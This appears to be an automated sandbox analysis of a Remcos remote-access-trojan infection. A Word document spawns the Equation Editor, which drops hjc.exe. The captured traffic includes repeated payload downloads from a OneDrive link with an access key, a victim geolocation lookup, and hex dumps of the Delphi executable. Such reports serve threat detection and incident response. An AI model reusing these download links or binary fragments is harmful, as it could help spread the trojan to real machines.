                                                                                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*hu@@xf @(c0CODEfh `DATAGHl@BSS].idataf "@.edatax@P.tls .rdata0@P.reloc(c@d@P.rsrc>@P@P
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512429953 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00
                                                                                                                                                                                  Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@String@
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512468100 CEST1289INData Raw: 59 5a c3 8b c0 53 56 57 55 83 c4 f8 8b d9 8b f0 8b fc 8b 06 89 07 8b 02 89 03 8b 42 04 89 43 04 8b 07 8b 00 89 44 24 04 8b 17 8b 52 08 8b ca 8b 2f 03 4d 0c 8b 03 3b c8 75 18 8b 07 e8 90 ff ff ff 8b 07 8b 40 08 89 03 8b 07 8b 40 0c 01 43 04 eb 16
                                                                                                                                                                                  Data Ascii: YZSVWUBCD$R/M;u@@CC;uq@CD$;7uu3YZ]_^[@SVWU$D$@;>_z;rv;u!BAB)BxuVM>_z;u
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512506962 CEST1289INData Raw: ff ff 33 c0 89 03 83 c4 0c 5d 5f 5e 5b c3 8b c0 53 56 57 55 83 c4 e8 89 0c 24 8b fa 8b d8 8d 74 24 04 bd f8 d5 56 00 81 c7 ff 3f 00 00 81 e7 00 c0 ff ff 8b 45 00 89 06 eb 06 8b 06 8b 00 89 06 3b 2e 74 07 8b 06 3b 58 08 75 ef 8b 06 3b 58 08 75 5f
                                                                                                                                                                                  Data Ascii: 3]_^[SVWU$t$V?E;.t;Xu;Xu_;x+P@AL$5|$t3L$T$o|$uL$T$D$$3L$|$t4L$T$(|$TL$T$D$4$
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922286987 CEST1289INData Raw: ff c3 83 fa 04 7c 0a 8b ca 81 c9 02 00 00 80 89 08 03 c2 83 20 fe c3 53 56 51 8b d0 83 ea 04 8b 12 8b ca 81 e1 02 00 00 80 81 f9 02 00 00 80 74 0a c7 05 c4 d5 56 00 04 00 00 00 8b da 81 e3 fc ff ff 7f 2b c3 8b c8 33 11 f7 c2 fe ff ff ff 74 0a c7
                                                                                                                                                                                  Data Ascii: | SVQtV+3tVt)r+$$;ptV$0Z^[SVQ3t%u$$$@#Z^[@SVWU3hD$|$
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922311068 CEST1289INData Raw: 44 24 04 8b c3 83 c8 02 8b 54 24 04 89 02 8b 44 24 04 83 c0 04 89 04 24 ff 05 b0 d5 56 00 83 eb 04 01 1d b4 d5 56 00 8b 04 24 83 c4 0c 5d 5f 5e 5b c3 55 8b ec 83 c4 ec 53 8b d8 80 3d c0 d5 56 00 00 75 09 e8 8d f7 ff ff 84 c0 74 08 81 fb f8 ff ff
                                                                                                                                                                                  Data Ascii: D$T$D$$VV$]_^[US=Vut~3Ev3Uh%@d2d"=IVthV6}y VTU}UUU"URUU;Uu V3L& V
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922317982 CEST1289INData Raw: 4f 8b 44 24 04 89 44 24 08 8b 54 24 08 8b 6a 08 3b fd 7e 0a 03 c5 89 44 24 04 2b fd eb 32 8b 44 24 08 e8 7e f4 ff ff 2b ef 83 fd 0c 7c 0e 8b 04 24 03 c3 8b d5 e8 3f f7 ff ff eb 4f 03 dd 8b 04 24 03 c3 89 44 24 04 8b 44 24 04 83 20 fe eb 3b 8b 44
                                                                                                                                                                                  Data Ascii: OD$D$T$j;~D$+2D$~+|$?O$D$D$ ;D$t*%D$D$D$t$D$3+V$%$]_^[USV=Vuu3E3UhU*@d2d"=IVth
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922385931 CEST1289INData Raw: 2d 40 00 eb 27 b8 00 00 00 40 ba 01 00 00 00 b9 02 00 00 00 eb 0f b8 00 00 00 c0 ba 01 00 00 00 b9 03 00 00 00 c7 46 1c 54 2d 40 00 c7 46 24 a0 2d 40 00 c7 46 20 50 2d 40 00 80 7e 48 00 0f 84 b2 00 00 00 6a 00 68 80 00 00 00 51 6a 00 52 50 8d 46
                                                                                                                                                                                  Data Ascii: -@'@FT-@F$-@F P-@~HjhQjRPFHPf~fNj6@-s1jjP6@jjRhLR6vZH19skLt@jj)P6e@6OHu
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922462940 CEST1289INData Raw: c7 43 04 b0 d7 33 f6 8b 03 e8 85 fa ff ff 84 c0 75 0a e8 10 f9 ff ff be 01 00 00 00 8b c6 5e 5b c3 8b c0 53 56 57 89 d6 89 cf 31 d2 89 c3 66 8b 50 04 81 ea b0 d7 00 00 74 15 83 fa 03 0f 87 a2 00 00 00 ff 53 24 85 c0 74 05 e8 c8 f8 ff ff 66 c7 43
                                                                                                                                                                                  Data Ascii: C3u^[SVW1fPtS$tfCsC$2@CP-@{Ht`EplEt!Gt@GfCtfCjhQjRPCHP<t$0C$P-@tjj4ffC
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922569990 CEST1289INData Raw: 91 0e a6 ae a0 19 e3 a3 46 17 0c 75 81 86 75 76 c9 48 4d e4 a7 93 39 3b 35 b8 b2 ed 53 e5 5d 3d c5 5d 3b 8b 9e 92 5a a6 f0 a1 20 c0 54 a5 8c 37 61 8b 5a 8b d8 25 5d 89 f9 db 67 f8 f3 27 bf a2 c8 5d dd 80 6e 9b 97 20 8a 02 52 60 c4 25 75 f0 59 d5
                                                                                                                                                                                  Data Ascii: FuuvHM9;5S]=];Z T7aZ%]g']n R`%uYnb5{%VS3juj%=t=u[U$EEEPjjh09@h5uM3Uh9@d0d EEPEPjjhL9@EP3ZYYd
                                                                                                                                                                                  Apr 24, 2024 07:41:54.922699928 CEST1289INData Raw: 06 38 d9 74 18 8d 74 31 07 4f 75 f2 8b 40 dc 85 c0 75 dc 5a eb 1b 8a 1a 8a 4e 06 eb e8 8a 5c 31 06 32 1c 11 80 e3 df 75 ed 49 75 f1 8b 06 5a 01 d0 5f 5e 5b c3 52 51 53 84 d2 7c 03 ff 50 f4 31 d2 8d 4c 24 10 64 8b 1a 89 19 89 69 08 c7 41 04 6d 3d
                                                                                                                                                                                  Data Ascii: 8tt1Ou@uZN\12uIuZ_^[RQS|P1L$diAm=@Ad[YZND$,@tPQXD@RSR[PRRZX=,EvjjjhV=,EtPPRTjjhVX@Tjjh


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.2249173178.237.33.50803572C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Apr 24, 2024 07:42:18.367506027 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Apr 24, 2024 07:42:18.676492929 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                                                  date: Wed, 24 Apr 2024 05:42:18 GMT
                                                                                                                                                                                  server: Apache
                                                                                                                                                                                  content-length: 965
                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.224916513.107.137.114433416C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-04-24 05:42:02 UTC213OUTGET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                                  2024-04-24 05:42:03 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4mpZajfWPqKjdE4uGrq5tmWJHmffdrvebeUi1KiWBx9grNpUr-Q2JlZ3LArHG3A_O0QfZb6Vfm5WSaPD3kyOwL0lvhBJcVzz9RORkZsQxwD-NGRK76oWxdM4Chy44IeLUE0Tpi2W75Z2hK2CtDKUYyLW_mMwTW_ZM1Mj-T6w-sGDdI059lJiHfmpILNrHyeh-zz1V74lsmMnt2ux1R0n3Hag/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:17BxRCFk3Ig=:weWtX4vAXYbwkwMNng/Dj3h6gJtw9oFoK5z1byHC4Ug=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=dc27097d-14e4-4236-abbf-c7c0d3e01ed7&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:02 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:03 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 58656754b6-n9vwb
                                                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 434BE4F39A1B4FE09A7021410B81D7C1 Ref B: BY3EDGE0212 Ref C: 2024-04-24T05:42:02Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:03 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.224916813.107.137.114433572C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-04-24 05:42:11 UTC213OUTGET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                                  2024-04-24 05:42:12 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4mio8rSS_2jC5-0VIhrGMPPnTg6gYb3Bxmu9ktmO2sVy1Vu5NgT_hEOa73bPesLFGHcLoom_BY6eeAPW-FHnqUKPhfl8sWhpjxEHt7pVekx6nM7q1SW8SVnXHPjZPuVg2rkxPm7gqokPnU5whnFsz2GcUBbv73tTRus4Jl03Vk2nJv6RFSKmpwSZ81Ok-BUBbMc6v_k9dL7o--kBdAqGrTcQ/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:ndQSSiFk3Ig=:DK0SYrfmoZH/U7P895DhhkPQOcsS751EIF/clKtKkJw=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=c0e070e1-2486-42cc-bde5-20047fba4201&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:11 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:12 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 58656754b6-lpk9s
                                                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 73B6CD00DCE340D0B923FA5D7EFD387D Ref B: BY3EDGE0407 Ref C: 2024-04-24T05:42:11Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:12 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.224917513.107.137.114433984C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-04-24 05:42:31 UTC213OUTGET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                                  2024-04-24 05:42:32 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4m8jjd3f9BpBLsSbDI3D4w4BLmop1yruq85sZlFAr-4Rol8mEokjtpsS6ivaddcrG-02EGs-2XauFUjX8FY7d53bCsLcKfkjXgpkSbw6TFx16xDDOU5aSxzi3W5XYaoKCrRHledOCtpWPLiyJxcXorVrYLocVfe5Td3_sPairUMveG-8qBlVjZGG5ac5cYczLGG810pmtWa_QzgyEzjmbnUw/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:/mPjVSFk3Ig=:oCUg3qyjS8ulDY8hmIZjBIcXufJIiZQndE/MpNRJhn4=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=74a65b92-581b-48f2-8cb3-4595ecae77d0&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:31 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:32 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 58656754b6-knhpb
                                                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 9D137ED6D1EF4A5EB0B6070B70E84DD2 Ref B: BY3EDGE0520 Ref C: 2024-04-24T05:42:31Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:31 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.224917813.107.137.11443172C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-04-24 05:42:41 UTC213OUTGET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                                  2024-04-24 05:42:42 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4mYCQQoHB3biLh5JPth5_f-kOB87DNi8p0jtMSHrwPoPCEVl-mpqMaKw_mqKIpuxjn2dNG-T2e2xR231bHUFOeFOYUuWZJn-Xs7N1n36MJhDdbtaOw1zjdzwAu5H9Z6mgm3NKd3HlFZY-5KRTk6agT858qEwO2vljQ2INgCwAXfVMQFxW79LWxDTPwEwcdmkpq5bjKDTjQIkrxej8Y9WhNWw/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:KgisWyFk3Ig=:/+ipv38dN7ivfaJbLIbhASMDuNNeYz8NLi6GcGlYD6s=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=4599e02a-0964-4e2b-9694-3247fc8405d9&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:41 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:42 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-w62dx
                                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 4323ACDDD43845F5BE165888BE661603 Ref B: BY3EDGE0415 Ref C: 2024-04-24T05:42:41Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:41 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.2.224918113.107.137.114433268C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-04-24 05:43:01 UTC213OUTGET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                                                  2024-04-24 05:43:02 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4m1QphtspBBMGygafIGFYGxEUuSWjKY2dMrUpXGeJNpqtj0i_A5B0XA1Aj7IMN8zjTgS9cMKAwTkj3FT5dXi2Eg2jSyv8_UUS0rdYNG0v0tQXlGRPZqXWmOEp1BuNTfvOXcE-pcZOsWsbrL26_I-vlDCLysJ0C7mY-EdGwevGP_cX1b9ESa_DJG5Tasdj_V6zCOP83wqnIMrfXBpw083kXBg/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:+S6JZyFk3Ig=:LdxGwW+LRdtGMCX5i6z2tEKPVBKB4IYlUfIKRnX/HNk=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=c54efc3b-3547-4b0e-916c-e215cb810e8e&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:03:01 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:43:02 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-wtd7d
                                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 73B2F62BC67F4CC6B3AD1E513D2941AA Ref B: BY3EDGE0320 Ref C: 2024-04-24T05:43:01Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:43:01 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:07:41:50
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                  Imagebase:0x13f240000
                                                                                                                                                                                  File size:1'423'704 bytes
                                                                                                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:07:41:51
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543'304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:07:41:59
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\hjc.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
